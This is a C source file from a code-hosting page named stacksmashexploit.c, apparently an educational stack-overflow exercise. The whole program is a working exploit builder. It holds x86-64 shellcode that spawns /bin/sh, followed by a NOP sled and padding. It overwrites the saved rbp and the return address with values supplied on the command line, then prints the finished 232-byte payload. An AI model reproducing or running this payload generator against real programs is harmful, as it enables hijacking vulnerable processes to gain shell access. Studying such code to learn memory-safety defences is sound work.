-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathstacksmashexploit.c
83 lines (72 loc) · 3.28 KB
/
stacksmashexploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
union
{
unsigned long long int llint;
unsigned char byte[8];
} longlongintUnion;
//Places the bytes for our raw 64-bit Linux/X86-64 shellcode in memory (will specifically be in the .data section)
//Added nop padding after shellcode
char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x48\xbb\xff\x2f\x62\x69\x6e\x2f" \
"\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48" \
"\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\x48\x89\xd7\xb0" \
"\x3c\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
//manually determined to overflow retptraddr with shellcodeaddr
char spacer[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90";
int main(int argc, char *argv[]) {
char** targv;//array of arguments variable to pass in to real_main(targc,targv)
int targc;//number of arguments variable to pass in to real_main(targc,targv)
int tstatus;//variable to store the return status from calling real_main(targc,targv)
unsigned long long int shellcodeaddr;
unsigned long long int oldrbp;
char *taintedbuf;
int taintedbufsize=232;
taintedbuf=malloc(taintedbufsize);
//checks the usage for calling wrapper
if (argc != 3) {
printf("Warning, incorrect args. Usage is $ ./stacksmashexploit <shellcodeAddr> <oldrbp>\n");
return(EXIT_FAILURE);
}
sscanf(argv[1],"%llx",&shellcodeaddr);
sscanf(argv[2],"%llx",&oldrbp);
memmove(taintedbuf,shellcode,sizeof(shellcode));//copy the shellcode into the taintedbuf
memmove(taintedbuf+sizeof(shellcode)-1,spacer,sizeof(spacer));//copy the spacer into the taintedbuf
char mybuf [8] __attribute__ ((aligned (8)));
//old rbp
longlongintUnion.llint= oldrbp;
mybuf[0]=longlongintUnion.byte[0];
mybuf[1]=longlongintUnion.byte[1];
mybuf[2]=longlongintUnion.byte[2];
mybuf[3]=longlongintUnion.byte[3];
mybuf[4]=longlongintUnion.byte[4];
mybuf[5]=longlongintUnion.byte[5];
mybuf[6]=longlongintUnion.byte[6];
mybuf[7]=longlongintUnion.byte[7];
memmove(taintedbuf+sizeof(shellcode)+sizeof(spacer)-2,(char*)mybuf, 8);
//ret fptr
longlongintUnion.llint= shellcodeaddr;
mybuf[0]=longlongintUnion.byte[0];
mybuf[1]=longlongintUnion.byte[1];
mybuf[2]=longlongintUnion.byte[2];
mybuf[3]=longlongintUnion.byte[3];
mybuf[4]=longlongintUnion.byte[4];
mybuf[5]=longlongintUnion.byte[5];
mybuf[6]=longlongintUnion.byte[6];
mybuf[7]=longlongintUnion.byte[7];
memmove(taintedbuf+sizeof(shellcode)+sizeof(spacer)+8-2,(char*)mybuf, 8);
for (int i=0;i<taintedbufsize;i++) {
printf("\\x%02x",(unsigned char)taintedbuf[i]);
}
printf("\n");
}